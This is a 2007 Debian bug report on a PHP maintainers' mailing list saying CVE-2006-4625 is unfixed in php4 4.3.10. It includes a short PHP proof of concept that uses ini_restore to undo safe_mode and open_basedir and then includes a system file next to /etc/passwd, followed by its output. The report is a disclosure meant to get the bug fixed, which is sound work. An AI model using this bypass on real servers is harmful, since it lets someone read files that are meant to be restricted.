[php-maint] Bug#424937: libapache2-mod-php4: CVE-2006-4625 not fixed on old stable

Etienne Carriere digits at rez-gif.supelec.fr
Thu May 17 22:03:46 UTC 2007 

Package: libapache2-mod-php4
Version: 4:4.3.10-20
Severity: important


I would like to verify if it is still possible to use the ini_restore
bug on our server . I determined that it is still possible : 

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwdd");
ini_restore("safe_mode");
ini_restore("open_basedir");
include("/etc/passwdd"); 
?>

gives : 

1
/home/webusers/JdR:/usr/share:/tmp
Warning: main(): open_basedir restriction in effect. File(/etc/passwdd)
is not within the allowed path(s): (/home/webusers/JdR:/usr/share:/tmp)
in /home/webusers/JdR/html/test.php on line 4

Warning: main(/etc/passwdd): failed to open stream: Operation not
permitted in /home/webusers/JdR/html/test.php on line 4

Warning: main(): Failed opening '/etc/passwdd' for inclusion
(include_path='.:/usr/share/fpdf:/usr/share/jpgraph/') in
/home/webusers/JdR/html/test.php on line 4

File with the permissions of /etc/passwd 

So i think that this security hole is still real in this 4.3
(and the bug is only corrected in 4.4.4 version) 

-- System Information:
Debian Release: 3.1
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.14.3n
Locale: LANG=fr_FR at euro, LC_CTYPE=fr_FR at euro (charmap=ISO-8859-15)

Versions of packages libapache2-mod-php4 depends on:
ii  apache2-mpm-prefork   2.0.54-5sarge1     traditional model for Apache2
ii  libbz2-1.0            1.0.2-7            high-quality block-sorting file co
ii  libc6                 2.3.2.ds1-22sarge6 GNU C Library: Shared libraries an
ii  libcomerr2            1.37-2sarge1       common error description library
ii  libdb4.2              4.2.52-18          Berkeley v4.2 Database Libraries [
ii  libexpat1             1.95.8-3           XML parsing C library - runtime li
ii  libkrb53              1.3.6-2sarge4      MIT Kerberos runtime libraries
ii  libmagic1             4.12-1sarge1       File type determination library us
ii  libpcre3              4.5-1.2sarge1      Perl 5 Compatible Regular Expressi
ii  libssl0.9.7           0.9.7e-3sarge4     SSL shared libraries
ii  libzzip-0-12          0.12.83-4          library providing read access on Z
ii  mime-support          3.28-1             MIME files 'mime.types' & 'mailcap
ii  php4-common           4:4.3.10-20        Common files for packages built fr
ii  zlib1g                1:1.2.2-4.sarge.2  compression library - runtime

-- no debconf information

More information about the pkg-php-maint mailing list